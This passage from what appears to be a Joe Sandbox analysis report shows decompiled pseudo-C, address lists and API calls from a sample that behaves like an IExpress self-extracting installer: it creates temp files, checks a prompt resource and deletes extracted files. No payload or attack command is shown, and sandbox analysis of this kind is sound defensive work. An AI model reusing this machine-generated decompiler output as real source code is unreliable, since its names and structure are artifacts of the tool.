                                                                                                                                                                                                                                            					return E00A4724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a46a60
                                                                                                                                                                                                                                            0x00a46a6a
                                                                                                                                                                                                                                            0x00a46a6c
                                                                                                                                                                                                                                            0x00a46a71
                                                                                                                                                                                                                                            0x00a46a78
                                                                                                                                                                                                                                            0x00a46a7f
                                                                                                                                                                                                                                            0x00a46a85
                                                                                                                                                                                                                                            0x00a46a8e
                                                                                                                                                                                                                                            0x00a46a91
                                                                                                                                                                                                                                            0x00a46a93
                                                                                                                                                                                                                                            0x00a46a9c
                                                                                                                                                                                                                                            0x00a46aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46aa6
                                                                                                                                                                                                                                            0x00a46ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46aa8
                                                                                                                                                                                                                                            0x00a46aaa
                                                                                                                                                                                                                                            0x00a46aab
                                                                                                                                                                                                                                            0x00a46aab
                                                                                                                                                                                                                                            0x00a46abf
                                                                                                                                                                                                                                            0x00a46abf
                                                                                                                                                                                                                                            0x00a46ac5
                                                                                                                                                                                                                                            0x00a46ad1
                                                                                                                                                                                                                                            0x00a46ad7
                                                                                                                                                                                                                                            0x00a46b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46ad9
                                                                                                                                                                                                                                            0x00a46ad9
                                                                                                                                                                                                                                            0x00a46ae9
                                                                                                                                                                                                                                            0x00a46af0
                                                                                                                                                                                                                                            0x00a46af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46af4
                                                                                                                                                                                                                                            0x00a46af4
                                                                                                                                                                                                                                            0x00a46afb
                                                                                                                                                                                                                                            0x00a46afb
                                                                                                                                                                                                                                            0x00a46af2
                                                                                                                                                                                                                                            0x00a46ac7
                                                                                                                                                                                                                                            0x00a46ac7
                                                                                                                                                                                                                                            0x00a46ac9
                                                                                                                                                                                                                                            0x00a46b0b
                                                                                                                                                                                                                                            0x00a46b0b
                                                                                                                                                                                                                                            0x00a46b11
                                                                                                                                                                                                                                            0x00a46b13
                                                                                                                                                                                                                                            0x00a46b18
                                                                                                                                                                                                                                            0x00a46b1d
                                                                                                                                                                                                                                            0x00a46b24
                                                                                                                                                                                                                                            0x00a46b24
                                                                                                                                                                                                                                            0x00a46b30
                                                                                                                                                                                                                                            0x00a46b39
                                                                                                                                                                                                                                            0x00a46b39
                                                                                                                                                                                                                                            0x00a46b3b
                                                                                                                                                                                                                                            0x00a46b42
                                                                                                                                                                                                                                            0x00a46b57
                                                                                                                                                                                                                                            0x00a46b5f
                                                                                                                                                                                                                                            0x00a46b65
                                                                                                                                                                                                                                            0x00a46b65
                                                                                                                                                                                                                                            0x00a46b67
                                                                                                                                                                                                                                            0x00a46b6c
                                                                                                                                                                                                                                            0x00a46b6e
                                                                                                                                                                                                                                            0x00a46b71
                                                                                                                                                                                                                                            0x00a46b74
                                                                                                                                                                                                                                            0x00a46b74
                                                                                                                                                                                                                                            0x00a46b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46b7d
                                                                                                                                                                                                                                            0x00a46b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46b83
                                                                                                                                                                                                                                            0x00a46b8c
                                                                                                                                                                                                                                            0x00a46b8d
                                                                                                                                                                                                                                            0x00a46b90
                                                                                                                                                                                                                                            0x00a46b90
                                                                                                                                                                                                                                            0x00a46b83
                                                                                                                                                                                                                                            0x00a46b81
                                                                                                                                                                                                                                            0x00a46b94
                                                                                                                                                                                                                                            0x00a46b98
                                                                                                                                                                                                                                            0x00a46ba2
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46b9a
                                                                                                                                                                                                                                            0x00a46ba3
                                                                                                                                                                                                                                            0x00a46bab
                                                                                                                                                                                                                                            0x00a46bb0
                                                                                                                                                                                                                                            0x00a46bb5
                                                                                                                                                                                                                                            0x00a46bbc
                                                                                                                                                                                                                                            0x00a46bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46bbf
                                                                                                                                                                                                                                            0x00a46c1e
                                                                                                                                                                                                                                            0x00a46c25
                                                                                                                                                                                                                                            0x00a46c27
                                                                                                                                                                                                                                            0x00a46c2d
                                                                                                                                                                                                                                            0x00a46c2d
                                                                                                                                                                                                                                            0x00a46c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46bc5
                                                                                                                                                                                                                                            0x00a46bc5
                                                                                                                                                                                                                                            0x00a46bc8
                                                                                                                                                                                                                                            0x00a46bcc
                                                                                                                                                                                                                                            0x00a46bce
                                                                                                                                                                                                                                            0x00a46bce
                                                                                                                                                                                                                                            0x00a46bd1
                                                                                                                                                                                                                                            0x00a46bd3
                                                                                                                                                                                                                                            0x00a46bd3
                                                                                                                                                                                                                                            0x00a46bd6
                                                                                                                                                                                                                                            0x00a46bda
                                                                                                                                                                                                                                            0x00a46be1
                                                                                                                                                                                                                                            0x00a46be3
                                                                                                                                                                                                                                            0x00a46be5
                                                                                                                                                                                                                                            0x00a46be5
                                                                                                                                                                                                                                            0x00a46be6
                                                                                                                                                                                                                                            0x00a46be6
                                                                                                                                                                                                                                            0x00a46be9
                                                                                                                                                                                                                                            0x00a46bea
                                                                                                                                                                                                                                            0x00a46bea
                                                                                                                                                                                                                                            0x00a46b74
                                                                                                                                                                                                                                            0x00a46c39
                                                                                                                                                                                                                                            0x00a46c3e
                                                                                                                                                                                                                                            0x00a46c3e
                                                                                                                                                                                                                                            0x00a46abe
                                                                                                                                                                                                                                            0x00a46abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A47182
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetCurrentProcessId.KERNEL32 ref: 00A47191
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetCurrentThreadId.KERNEL32 ref: 00A4719A
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: GetTickCount.KERNEL32 ref: 00A471A3
                                                                                                                                                                                                                                              • Part of subcall function 00A47155: QueryPerformanceCounter.KERNEL32(?), ref: 00A471B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A472B8,00000058), ref: 00A46A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A46AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A46AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A46B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A46B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A46BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A46BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 9d24c3af2b3bbc10d546e06cf3ad22c840cc12e1dcc2681a7787c88fa1aac453
                                                                                                                                                                                                                                            • Instruction ID: ce2298991f9dd4cc84ff9c46430577386d4204e3cfded66b8ec562cde978d14d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d24c3af2b3bbc10d546e06cf3ad22c840cc12e1dcc2681a7787c88fa1aac453
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E41E43C984764DBDB21EBA8E9447AE77B0FBC7751F14412AF941E3290CBB548838B42
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 a458c8-a458d5 632 a458d8-a458dd 631->632 632->632 633 a458df-a458f1 LocalAlloc 632->633 634 a458f3-a45901 call a444b9 633->634 635 a45919-a45959 call a41680 call a4658a CreateFileA LocalFree 633->635 638 a45906-a45910 call a46285 634->638 635->638 644 a4595b-a4596c CloseHandle GetFileAttributesA 635->644 645 a45912-a45918 638->645 644->638 646 a4596e-a45970 644->646 646->638 647 a45972-a4597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A458C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A41680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A4658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a458cd
                                                                                                                                                                                                                                            0x00a458d1
                                                                                                                                                                                                                                            0x00a458d3
                                                                                                                                                                                                                                            0x00a458d5
                                                                                                                                                                                                                                            0x00a458d8
                                                                                                                                                                                                                                            0x00a458d8
                                                                                                                                                                                                                                            0x00a458da
                                                                                                                                                                                                                                            0x00a458db
                                                                                                                                                                                                                                            0x00a458e1
                                                                                                                                                                                                                                            0x00a458ed
                                                                                                                                                                                                                                            0x00a458f1
                                                                                                                                                                                                                                            0x00a4591e
                                                                                                                                                                                                                                            0x00a4592c
                                                                                                                                                                                                                                            0x00a45943
                                                                                                                                                                                                                                            0x00a4594a
                                                                                                                                                                                                                                            0x00a4594d
                                                                                                                                                                                                                                            0x00a45953
                                                                                                                                                                                                                                            0x00a45959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4595b
                                                                                                                                                                                                                                            0x00a4595c
                                                                                                                                                                                                                                            0x00a45963
                                                                                                                                                                                                                                            0x00a4596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45972
                                                                                                                                                                                                                                            0x00a45974
                                                                                                                                                                                                                                            0x00a4597a
                                                                                                                                                                                                                                            0x00a4597a
                                                                                                                                                                                                                                            0x00a4596c
                                                                                                                                                                                                                                            0x00a458f3
                                                                                                                                                                                                                                            0x00a45901
                                                                                                                                                                                                                                            0x00a45906
                                                                                                                                                                                                                                            0x00a4590b
                                                                                                                                                                                                                                            0x00a45910
                                                                                                                                                                                                                                            0x00a45910
                                                                                                                                                                                                                                            0x00a45918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A458E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A4595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00A45534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                            • API String ID: 747627703-2139698323
                                                                                                                                                                                                                                            • Opcode ID: cf9faeb222b544b3d5fe1486e88ffd3103a27d4cf9e33eef73b1bacce9c2c10d
                                                                                                                                                                                                                                            • Instruction ID: c2d1cbd335625dfa0a6fa541104f023b8f5e1c221021f92cec266beb4e62943b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf9faeb222b544b3d5fe1486e88ffd3103a27d4cf9e33eef73b1bacce9c2c10d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9111E27DA002106BD7249FF9AC4DB9B7E99EFC6760B100619B50AE3192CB71980686A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A451E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E00A4468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E00A4468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E00A444B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0xa49124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0xa49124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x00a451fb
                                                                                                                                                                                                                                            0x00a45207
                                                                                                                                                                                                                                            0x00a4520b
                                                                                                                                                                                                                                            0x00a4523c
                                                                                                                                                                                                                                            0x00a45268
                                                                                                                                                                                                                                            0x00a45270
                                                                                                                                                                                                                                            0x00a4528b
                                                                                                                                                                                                                                            0x00a45293
                                                                                                                                                                                                                                            0x00a4529c
                                                                                                                                                                                                                                            0x00a452a6
                                                                                                                                                                                                                                            0x00a452b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a452b0
                                                                                                                                                                                                                                            0x00a4529e
                                                                                                                                                                                                                                            0x00a45279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4527b
                                                                                                                                                                                                                                            0x00a45273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45273
                                                                                                                                                                                                                                            0x00a4524a
                                                                                                                                                                                                                                            0x00a45250
                                                                                                                                                                                                                                            0x00a45256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45256
                                                                                                                                                                                                                                            0x00a45219
                                                                                                                                                                                                                                            0x00a45223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F4D,?,00000002,00000000), ref: 00A45201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A45250
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: 19ce20d04ed375f89bbcb16b2738079ca9477156c76c2a9ccd5fa999489dda2f
                                                                                                                                                                                                                                            • Instruction ID: 0c4a43fc79eab3a083db93130b0af847c18232d6a24f7d87726431f6bd19d3f2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19ce20d04ed375f89bbcb16b2738079ca9477156c76c2a9ccd5fa999489dda2f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F11104BDA41601BBE354ABF55D49F7B61ADEBDA381F10442EF602E6192DBFA8C024124
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E00A452B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0xa491e0; // 0x2ec8390
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0xa48a24 == 0 &&  *0xa49a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0xa48a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0xa48a24 == 0 &&  *0xa49a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00A41781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            					if(( *0xa49a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E00A465E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00A42390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0xa48a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0xa49a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00A41FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0xa48a20 =  *0xa48a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00A46CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x00a452b6
                                                                                                                                                                                                                                            0x00a452b6
                                                                                                                                                                                                                                            0x00a452b6
                                                                                                                                                                                                                                            0x00a452c1
                                                                                                                                                                                                                                            0x00a452c8
                                                                                                                                                                                                                                            0x00a452cb
                                                                                                                                                                                                                                            0x00a452cc
                                                                                                                                                                                                                                            0x00a452d4
                                                                                                                                                                                                                                            0x00a452d6
                                                                                                                                                                                                                                            0x00a452d7
                                                                                                                                                                                                                                            0x00a452de
                                                                                                                                                                                                                                            0x00a452e0
                                                                                                                                                                                                                                            0x00a452f2
                                                                                                                                                                                                                                            0x00a452fa
                                                                                                                                                                                                                                            0x00a452fa
                                                                                                                                                                                                                                            0x00a45302
                                                                                                                                                                                                                                            0x00a45305
                                                                                                                                                                                                                                            0x00a4530c
                                                                                                                                                                                                                                            0x00a45312
                                                                                                                                                                                                                                            0x00a45316
                                                                                                                                                                                                                                            0x00a45316
                                                                                                                                                                                                                                            0x00a45317
                                                                                                                                                                                                                                            0x00a4531c
                                                                                                                                                                                                                                            0x00a4531f
                                                                                                                                                                                                                                            0x00a45333
                                                                                                                                                                                                                                            0x00a45345
                                                                                                                                                                                                                                            0x00a45351
                                                                                                                                                                                                                                            0x00a45359
                                                                                                                                                                                                                                            0x00a45359
                                                                                                                                                                                                                                            0x00a45363
                                                                                                                                                                                                                                            0x00a45369
                                                                                                                                                                                                                                            0x00a4536f
                                                                                                                                                                                                                                            0x00a45374
                                                                                                                                                                                                                                            0x00a45374
                                                                                                                                                                                                                                            0x00a45381
                                                                                                                                                                                                                                            0x00a45387
                                                                                                                                                                                                                                            0x00a45387
                                                                                                                                                                                                                                            0x00a4538f
                                                                                                                                                                                                                                            0x00a453a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(02EC8390,00000080,?,00000000), ref: 00A452F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(02EC8390), ref: 00A452FA
